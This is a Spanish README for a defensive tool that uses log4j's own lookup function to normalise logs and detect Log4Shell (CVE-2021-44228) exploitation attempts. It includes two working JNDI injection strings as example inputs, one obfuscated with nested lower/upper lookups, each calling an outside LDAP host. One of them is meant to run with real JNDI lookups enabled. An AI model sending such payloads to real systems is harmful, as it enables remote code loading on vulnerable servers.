
Algunas herramientas para ayudar a mitigar Apache Log4j 2 CVE-2021-44228
Alguna herramienta para ayudar a analizar Apache Log4j 2 CVE-2021-44228
Esta herramienta utiliza la función "lookup" de log4j-2 para probar la vulnerabilidad JNDI. El objetivo es ejecutar fácilmente la función lookup (para normalizar registros, por ejemplo, o para hacer una prueba real sobre algún payload; tenga precaución).
Para compilar: "make" (por conveniencia, el archivo JndiLookup.jar está incluido en este git).
Una vez compilado, puede ejecutar la herramienta con "java -jar JndiLookup.jar" (el directorio log4j con los binarios de log4j debe estar en la misma ruta que JndiLookup.jar)
Sin argumentos, la herramienta JndiLookup lee líneas desde stdin y las "convierte" usando la función lookup de log4j; esto debería ser útil para normalizar registros y buscar intentos de explotación.
Por ejemplo: cat access.log | java -jar JndiLookup.jar
Si pasa una cadena a la línea de comandos, la herramienta convertirá esa cadena y saldrá (por favor, escape todos los caracteres '$').
Por ejemplo: java -jar JndiLookup.jar java -jar JndiLookup.jar "\${jndi:\${lower:l}\${lower:d}a\${lower:p}://world443.log4j.bin\${upper:a}ryedge.io:80/callback}"
De forma predeterminada, el lookup JNDI está deshabilitado (y se reemplaza por una función lookup que solo agregará "jndi:", pero es posible habilitar el lookup JNDI real pasando el parámetro "-X" a JndiLookup ("-X" debe pasarse como primer parámetro); TENGA MUCHA PRECAUCIÓN con esto porque podría comprometer su sistema.
Por ejemplo: java -jar JndiLookup.jar -X "\${jndi:ldap://w8pcb14reujq65vic39pz9amv.canarytokens.com/a}" [ Este ejemplo usa uno de mis canary tokens, es solo para el ejemplo; sepa que seré notificado si usa este comando; por mi parte no hay problema, pero obtendré la IP desde la que se realiza la solicitud DNS ]
Los siguientes lookups están habilitados en los binarios de log4j utilizados (2.15.0 para uso estándar, 2.14.1 para uso con JNDI habilitado):
Otros lookups pueden estar disponibles según su entorno:
[ Consulte https://github.com/apache/logging-log4j2/blob/c30a1398a6697fb832c650870c44284d0052103e/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java para obtener detalles sobre la activación del plugin lookup]
Tenga en cuenta que esta herramienta usa el código real de la función lookup de log4j y podría ser vulnerable debido a otros problemas de seguridad (no relacionados con JNDI).